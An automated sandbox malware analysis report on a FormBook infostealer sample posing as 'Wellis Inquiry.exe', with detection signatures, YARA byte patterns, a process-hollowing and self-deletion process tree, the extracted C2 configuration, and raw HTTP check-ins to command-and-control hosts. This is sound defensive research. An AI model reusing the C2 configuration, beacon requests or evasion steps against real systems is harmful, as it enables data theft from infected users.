Loading ...

Play interactive tourEdit tour

Windows Analysis Report Wellis Inquiry.exe

Overview

General Information

Sample Name:Wellis Inquiry.exe
Analysis ID:502627
MD5:c357a8010e661a49df2e813bd22590b6
SHA1:08ecd005e1449ec97d0405e83649686ae35f6286
SHA256:eef137583da6deb4a1be9882cede6cec5112b74ae79c0773f45b13346c5b2890
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Wellis Inquiry.exe (PID: 7036 cmdline: 'C:\Users\user\Desktop\Wellis Inquiry.exe' MD5: C357A8010E661A49DF2E813BD22590B6)
    • Wellis Inquiry.exe (PID: 1680 cmdline: C:\Users\user\Desktop\Wellis Inquiry.exe MD5: C357A8010E661A49DF2E813BD22590B6)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 5328 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 7092 cmdline: /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.psychedeliccosmetics.com/ag9v/"], "decoy": ["wordmagicshow.com", "dogparkdate.com", "quickcarehomeopathic.com", "azwar.net", "louisle1909.xyz", "section8lv.com", "felineness.com", "2888sy.com", "wadashoot.com", "kittyuniverse.com", "blushroses.com", "alaskangeneral.com", "yumoo.design", "7xkfic.com", "891827.com", "uspress1.com", "aceserial.xyz", "muellerconfidence.com", "eramakport.com", "tipsandtoesnewton.com", "withph.net", "kravesproet.quest", "restaurantemesana.com", "ghostpunk.art", "cobere9.com", "darshanshastra.com", "barnhsartcrane.com", "richartware.com", "welcomprom2.com", "plantvsundeadhelp.com", "hotsatisfy.com", "fullhindimovies.com", "beautynaturalcosmeticslk.com", "googglo.com", "hongyang98.com", "elishevazz.com", "ebookgratis.online", "urbanyinyoga.com", "sojuicybar.com", "seheon.email", "pokemongosrf.com", "catchytravel.com", "stonecoldice.net", "betinle137.com", "platinumridge.art", "agoodhotel.com", "preventbiotech.com", "ebonyslivestockservice.online", "billionairesboat.com", "dollpartyla.com", "naufragant.com", "cat2628.top", "ietwatiomlan.quest", "soulful-simplicity.com", "kalmmed.com", "luxuryray.com", "pknox.net", "687410.com", "blackmagiccomics.com", "usaworkerscorporation.com", "ovmfinacial.com", "marunouchi1.com", "feshwal.com", "qupontgon.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bec:$sqlite3step: 68 34 1C 7B E1
    • 0x6b08:$sqlite3text: 68 38 2A 90 C5
    • 0x6c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.Wellis Inquiry.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.Wellis Inquiry.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.Wellis Inquiry.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        3.2.Wellis Inquiry.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.Wellis Inquiry.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.psychedeliccosmetics.com/ag9v/"], "decoy": ["wordmagicshow.com", "dogparkdate.com", "quickcarehomeopathic.com", "azwar.net", "louisle1909.xyz", "section8lv.com", "felineness.com", "2888sy.com", "wadashoot.com", "kittyuniverse.com", "blushroses.com", "alaskangeneral.com", "yumoo.design", "7xkfic.com", "891827.com", "uspress1.com", "aceserial.xyz", "muellerconfidence.com", "eramakport.com", "tipsandtoesnewton.com", "withph.net", "kravesproet.quest", "restaurantemesana.com", "ghostpunk.art", "cobere9.com", "darshanshastra.com", "barnhsartcrane.com", "richartware.com", "welcomprom2.com", "plantvsundeadhelp.com", "hotsatisfy.com", "fullhindimovies.com", "beautynaturalcosmeticslk.com", "googglo.com", "hongyang98.com", "elishevazz.com", "ebookgratis.online", "urbanyinyoga.com", "sojuicybar.com", "seheon.email", "pokemongosrf.com", "catchytravel.com", "stonecoldice.net", "betinle137.com", "platinumridge.art", "agoodhotel.com", "preventbiotech.com", "ebonyslivestockservice.online", "billionairesboat.com", "dollpartyla.com", "naufragant.com", "cat2628.top", "ietwatiomlan.quest", "soulful-simplicity.com", "kalmmed.com", "luxuryray.com", "pknox.net", "687410.com", "blackmagiccomics.com", "usaworkerscorporation.com", "ovmfinacial.com", "marunouchi1.com", "feshwal.com", "qupontgon.quest"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Wellis Inquiry.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Wellis Inquiry.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Wellis Inquiry.exe, cmmon32.exe
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.marunouchi1.com
          Source: C:\Windows\explorer.exeNetwork Connect: 183.90.240.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 151.106.117.36 80
          Source: C:\Windows\explorer.exeDomain query: www.richartware.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.ebookgratis.online
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeDomain query: www.ovmfinacial.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.blackmagiccomics.com
          Source: C:\Windows\explorer.exeDomain query: www.psychedeliccosmetics.com
          Source: C:\Windows\explorer.exeDomain query: www.dollpartyla.com
          Source: C:\Windows\explorer.exeDomain query: www.aceserial.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.2.218 80
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.aceserial.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.psychedeliccosmetics.com/ag9v/
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: SAKURA-CSAKURAInternetIncJP SAKURA-CSAKURAInternetIncJP
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.marunouchi1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.psychedeliccosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.aceserial.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ebookgratis.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ovmfinacial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.dollpartyla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 14 Oct 2021 05:29:51 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Thu, 14 Oct 2021 05:29:57 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 14 Oct 2021 05:30:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 189X-Sorting-Hat-ShopId: 59880997054X-Request-ID: ff951e54-78cb-49de-931e-6e9b39ead4a9X-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 69de6a78386b698b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: Wellis Inquiry.exe, 00000000.00000003.655430474.0000000006353000.00000004.00000001.sdmpString found in binary or memory: http://en.wikip
